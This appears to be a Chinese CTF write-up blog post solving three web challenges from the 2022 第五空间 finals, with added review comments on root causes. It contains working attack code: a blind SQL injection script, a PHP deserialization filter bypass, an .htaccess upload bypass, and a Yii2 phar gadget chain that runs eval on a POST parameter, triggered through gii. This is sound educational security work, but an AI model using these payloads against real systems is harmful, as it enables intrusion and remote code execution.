web

easysqli

扫描目录发现login.php

图片

User-Agent: universe PC

Accept: application/flag

注入点:index.php?id=

image

/index.php?id=1'%26%26if(ascii(substr((select%09database()),1,1))>0,1,0)--%09

# -*- coding: utf-8 -*-
# @Time : 2022/9/26 9:17
# @Author : pysnow
import requests
import re
# web2
# atable,flag,users
# 5.7.31
# Boolean-based blind extraction against the challenge's `id` parameter.
# Each request asks one yes/no question ("is the character code at position i
# greater than mid?") and reads the answer from whether the page renders its
# normal content.
#
# NOTE(review): this only works if index.php splices `id` into the SQL text
# (presumably by string concatenation; the server code is not shown here).
# Binding `id` as a prepared-statement parameter or casting it to an integer
# removes the injection point. On the detection side, the loop below sends a
# long run of sequential GETs whose `id` contains `if(`, `ascii(substr(` and
# tab characters, which is a distinctive pattern in access logs.

# Placeholder that is overwritten on the next line.
url = ''
# Request template: the `{}` inside `if({},1,0)` receives the boolean condition.
url = "http://39.107.234.204:40957/index.php?id=1'%26%26if({},1,0)--\x09"
# Condition template: first `{}` is the character position, second `{}` is the
# threshold. Every space is replaced by a tab (\x09); presumably the challenge
# filters the space character.
payload = "ascii(substr((select group_concat(a.2) from (select 1,2 union select * from users)a),{},1))>{}".replace(
    " ", '\x09')
# Characters recovered so far.
result = ''
# Defined but never passed to requests.get() below, so requests are not proxied.
proxy = {"http": "127.0.0.1:8080"}
# Walk positions 1..99; there is no early exit once the value has been read.
for i in range(1, 100):
    # Binary-search the character code in the range [27, 150].
    head = 27
    tail = 150
    while head < tail:
        mid = (head + tail) >> 1
        final = url.format(payload.format(i, mid))
        # print(final)
        r = requests.get(final)
        # print(r.text[2980:])
        # The marker text in the response is treated as "condition was true",
        # i.e. the character code is greater than mid.
        if '星球名字' in r.text:
            head = mid + 1
        else:
            tail = mid
    # head now holds the code the search converged on for position i.
    result += chr(head)
    print(result)

通过这个注入得到数据

(自己替换空格)
表名:
select group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()
atable,flag,users

无列名注入:
select group_concat(a.2) from (select 1,2 union select * from users)a

flag表
数据:flag_is_in_login.php

users表
数据:
用户名:administrator
密码:oh_you_got_my_password

接着直接在login.php修改一下UA头和Accept头换成指定的关键词登陆就行了

图片(1)

upload

访问 http://39.107.75.148:21106/index.php?source=1 拿到源码

// Challenge source: a class whose destructor acts on its own property state.
// An instance created by unserialize() carries whatever property values the
// serialized string supplied, so $value is attacker-controlled on that path.
class Gethint{
    protected $value=0;

    // Runs when the object is destroyed; prints $value, then either calls
    // show_flag() (defined outside this excerpt) or terminates the script.
    public function __destruct(){
        echo $this->value;
        // Loose comparison (==), so the check is not limited to the integer 1.
        if($this->value==1)
            show_flag();
        else
            die('nonono');
    }

}
// Request data flows straight into unserialize() below.
$hh=$_GET['hh'];
// NOTE(review): deleting a class name is not an effective filter. str_replace()
// makes a single pass and does not re-scan its own output, so characters on
// either side of a removed match can join up and form the same token again.
$hh=str_replace('Gethint', '', $hh);
// NOTE(review): the root cause is unserialize() on untrusted input. Prefer a
// data-only format such as json_decode(); if unserialize() must stay, pass
// ['allowed_classes' => false] so that no application class is instantiated.
unserialize($hh);
<?php

// Local copy of the challenge class with the property preset to the value the
// destructor checks for.
class Gethint{
    protected $value=1;

}

// Serialize an instance of the local class.
$final = serialize(new Gethint);
// Nest the class name inside itself: once the server-side filter deletes the
// inner 'Gethint', the remaining characters spell the original name again.
// This is why a single-pass deletion filter offers no protection.
$final = str_replace('Gethint','GethGethintint',$final);
// URL-encode the result; a protected property's serialized name contains NUL
// bytes that would not survive a raw query string.
echo urlencode($final);

image-20220926173730936

9d7503608bf089e2ffb4fdb7ad1ccd23.php

image-20220926174453832

image-20220926174444368

过滤了php标签,而且又是php5.7以下,可以直接使用php 前端标签,这里我直接使用base64编码绕过

image-20220926174935341

AddType application/x-httpd-php .jpg
php_value auto_append_file php://filter/convert.base64-decode/resource=/var/www/html/upload/820097d390f6d5aa076fb0d1721b0aa4/1.jpg

image-20220926175048779

image-20220926175246873

codereview

yii2框架主控制器源码如下

<?php

namespace app\controllers;

use Yii;
use yii\filters\AccessControl;
use yii\web\BadRequestHttpException;
use yii\web\Controller;
use yii\web\ForbiddenHttpException;
use yii\web\Response;
use yii\web\UploadedFile;
use yii\filters\VerbFilter;
use app\models\LoginForm;
use app\models\ContactForm;
use app\models\UploadForm;

/**
 * Main site controller of the challenge application (Yii2 basic-template layout).
 *
 * Review summary: the access filter only covers `logout`, so every other action,
 * including `upload`, is reachable without authentication.
 */
class SiteController extends Controller
{
    /**
     * {@inheritdoc}
     */
    public function behaviors()
    {
        return [
            'access' => [
                'class' => AccessControl::className(),
                // The filter is applied to `logout` only; no other action is access-controlled.
                'only' => ['logout'],
                'rules' => [
                    [
                        'actions' => ['logout'],
                        'allow' => true,
                        // '@' matches authenticated users.
                        'roles' => ['@'],
                    ],
                ],
            ],
            'verbs' => [
                'class' => VerbFilter::className(),
                'actions' => [
                    // Logout is accepted via POST only.
                    'logout' => ['post'],
                ],
            ],
        ];
    }

    /**
     * {@inheritdoc}
     */
    public function actions()
    {
        return [
            'error' => [
                'class' => 'yii\web\ErrorAction',
            ],
            'captcha' => [
                'class' => 'yii\captcha\CaptchaAction',
                // Fixed captcha code only when YII_ENV_TEST is set; otherwise null.
                'fixedVerifyCode' => YII_ENV_TEST ? 'testme' : null,
            ],
        ];
    }

    /**
     * Displays homepage.
     *
     * @return string
     */
    public function actionIndex()
    {
        return $this->render('index');
    }

    /**
     * Login action.
     *
     * @return Response|string
     */
    public function actionLogin()
    {
        // Already-authenticated users are sent to the home page.
        if (!Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $model = new LoginForm();
        if ($model->load(Yii::$app->request->post()) && $model->login()) {
            return $this->goBack();
        }

        // Clear the password so it is not echoed back into the re-rendered form.
        $model->password = '';
        return $this->render('login', [
            'model' => $model,
        ]);
    }

    /**
     * Logout action.
     *
     * @return Response
     */
    public function actionLogout()
    {
        Yii::$app->user->logout();

        return $this->goHome();
    }
    /**
     * Displays about page.
     *
     * @return string
     */
    public function actionAbout()
    {
        return $this->render('about');
    }

    /**
     * Upload action.
     *
     * On POST, binds the uploaded file to an UploadForm, validates it and stores
     * it under a hard-coded uploads directory; otherwise renders the upload form.
     *
     * NOTE(review): this action is not covered by the access filter in behaviors(),
     * so it can be called without logging in. Which file types are accepted depends
     * on UploadForm's validation rules, which are not shown here - confirm that
     * they enforce an extension/MIME allow-list.
     *
     * @return string the saved file path, JSON-encoded validation errors, or the rendered form
     */
    public function actionUpload()
    {
        $model = new UploadForm();

        if (Yii::$app->request->isPost) {
            $model->file = UploadedFile::getInstance($model, 'file');

            if ($model->file && $model->validate()) {
                // The stored name is built from the client-supplied base name and
                // extension. A server-generated name (e.g. a random identifier) would
                // stop the client from choosing the on-disk file name.
                // NOTE(review): the target directory looks like it sits under the
                // web root ("WWW/.../uploads") - confirm; uploads are safer outside it.
                $path = 'D:/phpstudy_pro/WWW/5space/uploads/' . $model->file->baseName . '.' . $model->file->extension;
                // The return value of saveAs() is not checked.
                $model->file->saveAs($path);
                // Returning the absolute path discloses the server's directory layout.
                return $path;
            }else{
                return json_encode($model->errors);
            }
        }

        return $this->render('upload', ['model' => $model]);
    }
}

图片(2)

起了个环境,发现版本是2.0.45,网上没找到现成的链子,但是在upload 目录下给了phar 链子(好心的出题人uploads/phar.jpg),也有上传文件点,直接找触发点

O:41:"PhpOffice\PhpSpreadsheet\Shared\XMLWriter":1:{s:55:" PhpOffice\PhpSpreadsheet\Shared\XMLWriter tempFileName";O:28:"GuzzleHttp\Psr7\AppendStream":2:{s:37:" GuzzleHttp\Psr7\AppendStream streams";a:1:{i:0;O:29:"GuzzleHttp\Psr7\CachingStream":2:{s:43:" GuzzleHttp\Psr7\CachingStream remoteStream";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";b:0;}s:6:"stream";O:26:"GuzzleHttp\Psr7\PumpStream":3:{s:34:" GuzzleHttp\Psr7\PumpStream source";C:32:"Opis\Closure\SerializableClosure":187:{a:5:{s:3:"use";a:0:{}s:8:"function";s:32:"function(){eval($_POST['cmd']);}";s:5:"scope";s:26:"GuzzleHttp\Psr7\PumpStream";s:4:"this";N;s:4:"self";s:32:"000000007a36b6140000000073ec9443";}}s:32:" GuzzleHttp\Psr7\PumpStream size";i:-10;s:34:" GuzzleHttp\Psr7\PumpStream buffer";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";s:1:"j";}}}}s:38:" GuzzleHttp\Psr7\AppendStream seekable";b:1;}}

后面有空可以复现一下这个链子

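这道题开了debug模式,并且启用了gii组件,访问:http://39.107.243.76:18517/index.php?r=gii 然后添加拓展。触发点在于生成器的 outputPath 由请求参数控制,预览时应当会对该路径做文件系统操作;在 PHP 8 之前,对 phar:// 路径做文件操作会反序列化 phar 的元数据,于是上面的链子被触发。从防御角度看,gii 和 debug 模块只应在开发环境启用,并通过 allowedIPs 限制访问来源。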

图片(3)

图片(4)

Generator[vendorName]=pysnow&Generator[packageName]=yii2-pysnow&Generator[namespace]=\pysnow\&Generator[type]=yii2-extension&Generator[keywords]=yii2,extension&Generator[license]=Apache-2.0&Generator[title]=pysnow&Generator[description]=pysnow&Generator[authorName]=pysnow&Generator[authorEmail]=pysnow@qq.com&Generator[outputPath]=phar:///tmp/phar.jpg&Generator[template]=default&preview=&cmd=system('cat /flag');

post传参cmd参数,然后RCE

最后修改:2022 年 09 月 26 日
文章标题:2022 第五空间网络安全决赛
本文地址:https://pysnow.cn/archives/467/
版权说明:若无注明,本文皆Pysnow's Blog原创,转载请保留文章出处。